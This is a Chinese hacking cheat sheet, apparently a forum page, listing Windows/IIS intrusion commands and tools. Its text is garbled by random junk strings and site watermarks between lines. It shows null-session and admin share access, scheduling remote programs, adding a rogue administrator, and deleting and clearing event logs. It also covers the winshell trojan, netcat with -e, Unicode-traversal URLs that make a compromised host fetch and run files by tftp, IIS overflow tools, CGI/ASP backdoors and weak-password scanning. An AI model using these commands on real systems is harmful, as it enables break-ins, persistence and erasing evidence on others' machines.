网管和黑客都必须知道的命令!看了不要做坏事!

.WS6W\8JK5B"m0

 网管和黑客都必须知道的命令!看了不要做坏事! SupeSite/X-Space官方站;R-s8R]0` osU(d]

常用的几条NET命令： 
;i,i#C
{FR&~~mj0 SupeSite/X-Space官方站;g9C)M&RW$D-KXg+b
================================================== 
/EF:GF;j&t3\0 SupeSite/X-Space官方站)];n^$DU.W
（与远程主机建立空管连接） net use \\IP地址\ipc$ "" /use:"" 
_ T4mPp0 SupeSite/X-Space官方站m9aT3z M/c#\
（以管理员身份登录远程主机） net use \\IP地址\ipc$ "密码" SupeSite/X-Space官方站~\0|zHA$EYg"Q
/use:"Administrator" 
*T"C2CS8lX5FOG#Z0 
LF [+v(Aa`~e^aI0（传送文件到远程主机WINNT目录下）copy 本机目录路径\程序 \\IP
+^~8I D`Y9J7M/gZ[0地址\admin$  SupeSite/X-Space官方站%\3w$}2J.u:jn
 SupeSite/X-Space官方站{%tJ)u[;@0F
（查看远程主机时间） net time \\IP地址 
&|sk-Yd[i`,C0 
#_ f%t5ZANG5tm0（定时启动某个程序） at \\IP地址 02:18 readme.exe  SupeSite/X-Space官方站W [9v/xXQ9y
 
3\,tND.]"m4K%s0（查看共享） net view \\IP地址 
@,Kd v
^W^0 SupeSite/X-Space官方站1f"^{1u+U3k
（查看netbios工作组列表） nbtstat -A IP地址  SupeSite/X-Space官方站 ~G@7q1b*?th2]
 
:V-[;r } ?#I3Y_.Z0（将远程主机C盘映射为自己的F盘） net use f: \\IP地址\c$ SupeSite/X-Space官方站'c n,DUMLq
""/user:"Administrator"  SupeSite/X-Space官方站-a|'f\"iI}:|
 SupeSite/X-Space官方站 CU:[0dH/[Vo
（这两条把自己增加到管理员组）： net user 用户名 密码 /add 
"VI7wb$e?,|8A ?0 
!]O qw%SmW0net localgroup Administrators 用户名 /add 
,DL!W0G.P5p*pi0 
8yZD(YFX8eTE0（断开连接） net use \\IP地址\ipc$ /delete  SupeSite/X-Space官方站-nDxHE
 
}OM].HU6a#A0=====================================================  SupeSite/X-Space官方站ArDb'i6F*Uy-S
 SupeSite/X-Space官方站 o\C"J3I[*bT7o
擦屁屁：  SupeSite/X-Space官方站,v)q@
K G$K!ssR
 SupeSite/X-Space官方站e-uCs&U:Z F
del C:\winnt\system32\logfiles\*.* 
?L(Bkpsr6L!F}0 
u&U `fh.GwdI0del C:\winnt\system32\config\*.evt 
BRgzAnN0 
w9gj vg oK0del C:\winnt\system32\dtclog\*.*  SupeSite/X-Space官方站.F8~Wt(I ]8X
 
&HU Vb:Y J,u+C&N0del C:\winnt\system32\*.log  SupeSite/X-Space官方站-c0_(EcS0KB
 SupeSite/X-Space官方站&D!Z-w'_2K6F\8t
del C:\winnt\system32\*.txt  SupeSite/X-Space官方站$J5l,iGK e
 
.pRaGgD!P nj0del C:\winnt\*.txt 
b*`~g)V0 
}(eVKTs0del C:\winnt\*.log 
Z"n/Ach%D0 
tni@U TlDR0============================  SupeSite/X-Space官方站9Say;W'p8X8Ck
 
2]jn b?pR_0一、netsvc.exe 
,^/fFy:X3n0Y4d.n0 
*v2b%r#BuX0下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时SupeSite/X-Space官方站9xg4p4R"Nr1O9?T0F
间任务”服务： 
6lic^0o(a#]0 
8cr3P1lXH8K!y/R6C0netsvc /list \\IP地址  SupeSite/X-Space官方站} d-\"DN}6z H@$Y
 SupeSite/X-Space官方站iV[:]+mp
netsvc schedule \\IP地址 /query  SupeSite/X-Space官方站L%RUa3x(b
 
.u'`'h2wt6I0netsvc \\IP地址 schedule /start 
m
k*ij^`0 
'Z^HkT0二、OpenTelnet.exe  SupeSite/X-Space官方站aLh G'dJ!tS8c)Y
 
3Qk2R#a9L%x9}(XS0远程启动主机的Telnet服务，并绑定端口到7878，例如：  SupeSite/X-Space官方站0dy#I!z By-R3u!y
 
;o E-U.N3Q o'T AP"E[%r0OpenTelnet \\IP地址 用户名 密码 1 7878  SupeSite/X-Space官方站X4_:f-Ii
 
gQHj${K w2li.O,A0然后就可以telnet到主机的7878端口，进入DOS方式下： 
r5C+rZ5A#{E0 SupeSite/X-Space官方站`LQ*JhrH,K;V)Y
telnet IP地址 7878 
0g!l)G:xZN0 SupeSite/X-Space官方站"@]!vo&?o"o,g
三、winshell.exe  SupeSite/X-Space官方站Kfx"H*XM j
 SupeSite/X-Space官方站)inwmv.m
一个非常小的木马（不到6K），telnet到主机的7878端口，输入密码
5bMA~J.W/\0winshell，当看到CMD>后，可打下面的命令： 
%igM7gfl%n!Z0 
4QJ _,M Nm%z0p Path （查看winshell主程序的路径信息） 
A ` |1Lt5S;bBK(N0 
M|Dv7p9kw6^oL0b reBoot （重新启动机器）  SupeSite/X-Space官方站'`2hN]|X8VW
 
A)~+J&G%h7iII0d shutDown （关闭机器） 
Xi8di|R$N k}yF0 
)RG s7}+V)?0s Shell （执行后你就会看到可爱的“C:\>”）  SupeSite/X-Space官方站&j*_+C~lk
 SupeSite/X-Space官方站z@*cR!w w*i~-_'t&\
x eXit （退出本次登录会话，此命令并不终止winshell的运行）  SupeSite/X-Space官方站.WC9T }/mNl7}
 SupeSite/X-Space官方站kK"o*lZos[PTJ&C
CMD> http://.../srv.exe （通过http下载其他网站上的文件到运行SupeSite/X-Space官方站I8v"yPE-o
winshell的机器上）  SupeSite/X-Space官方站gzO
z#G}N9y
 
?2G2B Nb/Q,j0四、3389登陆器，GUI方式登录远程主机的  SupeSite/X-Space官方站6bH\ fs:XXN
 SupeSite/X-Space官方站[f^EliQ
五、elsave.exe  SupeSite/X-Space官方站:eWr!u-e$|MkO
 
0MI0q"V0c C0事件日志清除工具  SupeSite/X-Space官方站]&dy*dJ(@G
 SupeSite/X-Space官方站]Ba?
sBhw{F
elsave -s \\IP地址 -l "application" -C  SupeSite/X-Space官方站Bm9jZ'sz
 SupeSite/X-Space官方站%S b~]O
[co
elsave -s \\IP地址 -l "system" -C  SupeSite/X-Space官方站 [c.I:HxL8EG
 
6Z,J:lH}D[`0l0elsave -s \\IP地址 -l "security" -C  SupeSite/X-Space官方站t-c?j g Y
 SupeSite/X-Space官方站S3hv Ak
执行后成功清除应用程序日志，系统日志，安全日志  SupeSite/X-Space官方站/_C%BC\ {%gG
 
%`[h#ws#ua&D#\0六、hbulot.exe  SupeSite/X-Space官方站)V%`6UH F6n/j d
 SupeSite/X-Space官方站7M0Bf X&J(N
开启win2kserver和winxp的3389服务  SupeSite/X-Space官方站muE2~6N ov
 
-K#E7e f&?2hl0hbulot [/r] 
i@f"RC&M0 
eO8LBs ijb-P w0使用/r表示安装完成后自动重起目标使设置生效。 
ltn?a'BWJx0 
!`1P)Fh5x:m-V6Z0七、nc.exe(netcat.exe)  SupeSite/X-Space官方站"gX%d:J+NU
r
 
e9ms0RV_
p0一个很好的工具，一些脚本程序都要用到它，也可做溢出后的连接用。  SupeSite/X-Space官方站/d*ly7CTN
 SupeSite/X-Space官方站2W,g7c m-N s2cCQ
想要连接到某处: nc [-options] hostname port[s] [ports] ... 
:AT3P#FH({f0 SupeSite/X-Space官方站#M
sBU
D8I3p
绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 
3P0BpL!N.z+J~0 SupeSite/X-Space官方站x-RW
`7D`
参数:  SupeSite/X-Space官方站c2dcFc)BO
 
c3w aM6_3I!k(^r0-e prog 程序重定向，一旦连接，就执行 [危险!!] 
4QR}v+Va%p.j0 
(`:rE%W;p2^X-N0-g gateway source-routing hop point[s], up to 8 
*qmTx5euY0 
R m3_1^)Dq!M0-G num source-routing pointer: 4, 8, 12, ...  SupeSite/X-Space官方站 Q2hr@_T7c$H
 SupeSite/X-Space官方站;J-MPDa"d,y
-h 帮助信息  SupeSite/X-Space官方站mNG~-z8I
 
+V[9}5kqr0-i secs 延时的间隔 
@,Pq8B owb}0 SupeSite/X-Space官方站9`2_5R8aQ2C"@3o
-l 监听模式，用于入站连接  SupeSite/X-Space官方站&GB!`6fi)i&g1Wn
 SupeSite/X-Space官方站Q&T A1E4sO-O6?
-n 指定数字的IP地址，不能用hostname 
4t S"S`9J_A2H9Y0 
5G)BR&zy!A0-o file 记录16进制的传输 
0k \EK x A'K.R]L0 
9nT(V)^t7x^ V p0-p port 本地端口号  SupeSite/X-Space官方站#W|k j)J B*F#F] \M
 
'{+P(h5S8Mc1t w0-r 任意指定本地及远程端口 
&G'C6c#Gz@0 
8D#HF8rEj8C.ON0-s addr 本地源地址 
~1EWc;oaD$u0 
3iS)I)R*b2YE0-u UDP模式 
X"\uM
d8K1\0 SupeSite/X-Space官方站qjYKN*S
-v 详细输出——用两个-v可得到更详细的内容  SupeSite/X-Space官方站/pd8gfC-t'}y
 
#NyP]'h/c/f,c PY0-w secs timeout的时间 
&Y]n'H/QO6H0 
!zl6u$tIY0-z 将输入输出关掉——用于扫描时 
3sCpo$N*Juu\V0 SupeSite/X-Space官方站b4I;O
y%pT3}:E
八、TFTPD32.EXE 
L.UXsWR0 
-cvaw]3r0把自己的电脑临时变为一台FTP服务器，让肉鸡来下载文件，tftp命令
oj6I(g'K!S1\0要在肉鸡上执行，通常要利用Unicode漏洞或telnet到肉鸡，例如：  SupeSite/X-Space官方站s1a+hR|w_-GM
 
MD$U.AJV0http://IP地址/s
"`:Y~ P*B`Q.F(Z+s0cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IPSupeSite/X-Space官方站6M]F%tv1X9MpQG
地址 get 文件名 c:\winnt\system32\文件名 
$p&]]^#}0[%f6b0 SupeSite/X-Space官方站&Un%I:x5ux/\&S6Cqk
然后可以直接令文件运行：  SupeSite/X-Space官方站!T+jr6D9p
 
+W'JB-hDT8b`&r5^\0http://IP地址/s SupeSite/X-Space官方站 O*TFK r
cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 
YL!|lm@*U#`0 SupeSite/X-Space官方站b sC,gw~ia
九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe
8xc Q7v|)]w$Y
Za0是溢出idq的，选择“溢出后在一个端口监听”，然后用telnet连接
vm8y%}F5T0它的监听端口，如果溢出成功，一连它的端口，绑定的命令马上执行。
si-z8O,@gD0xploit.exe是一个图形界面的ida溢出，成功以后winxp下需要打
[Cr I%tw0winxp。 
y8iCWl~0 SupeSite/X-Space官方站u Z+cD_Ms}X,Y&X
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor，exe
Ml1}Q%g&r&a%Y0要放到cgi-bin目录下，asp放到有ASP执行权限的目录。然后用IESupeSite/X-Space官方站3s(JK3sF7G;\L
浏览器连接。  SupeSite/X-Space官方站S9|%`{q
 SupeSite/X-Space官方站.`d5b0D E,S
一、一 Xscan命令行运行参数说明： 
'M;JR ]~,]QO0 
\'rzjD0在检测过程中，按"[空格]"键可以查看各线程状态及扫描进度，按"q"SupeSite/X-Space官方站/a&Ii].HfU ]
键保存当前数据后提前退出程序，按""强行关闭程序。 
$}O1d&s$K
f/U0d0 SupeSite/X-Space官方站R1}&cvc
1.命令格式: xscan -host [-]  [其他选项] 
Z,o-X p&Q W7Am I0 
EVV Y/b Py0xscan -file   [其他选项]  SupeSite/X-Space官方站z&K~ Q[kZBY
 SupeSite/X-Space官方站;Y dQ0C'jZt"v0O
其中 含义如下: 
|(_[4\6O7LWE$]z(U0 

~)M%}.n S+`0-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的
&lsN yW*B.@0"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表)； 
~pQ"s hx3IXUT}4x0 SupeSite/X-Space官方站/jn;x7_T0iGvE
-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码SupeSite/X-Space官方站9z*QP,o#c
字典文件)；  SupeSite/X-Space官方站
d{)~9vhb
 
+@2ed}H#GQ[n3nM0-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用SupeSite/X-Space官方站1F
oR.A6q2c j t&ML
户名/密码字典文件)；  SupeSite/X-Space官方站5bZ\Zw2tN
 
fIbeA(AE/W8WA6^0-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的
_ ^?8Hd1X0"CGI-ENCODE\encode_type"项设置编码方案)；  SupeSite/X-Space官方站7bwm;b.Q%B(f
 
!xdE"N1d%DH|0-iis : 检测IIS漏洞(可通过\dat\config.ini文件的SupeSite/X-Space官方站8sA3n,VhGy_
"CGI-ENCODE\encode_type"项设置编码方案)； 
jh_NXBV0 SupeSite/X-Space官方站!W.dP-j7tFen
[其他选项] 含义如下:  SupeSite/X-Space官方站dB6i iC;j6s4M
L%r w
 
Eo(X)V1M6qF:K ?8k4?8O0-v: 显示详细扫描进度  SupeSite/X-Space官方站?R!h[)qbs.v
 
F J"k+xyAa e0-p: 跳过Ping不通的主机 
E'D
@^~?0 
q%A,P$p-e;b Z$o4V&H0-o: 跳过没有检测到开放端口的主机 
^HP U&g9U6i,]0 SupeSite/X-Space官方站b Z9eQ'ja8L
-t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10SupeSite/X-Space官方站KgK ].b"u:K

 SupeSite/X-Space官方站!J-G;J0i [{,gn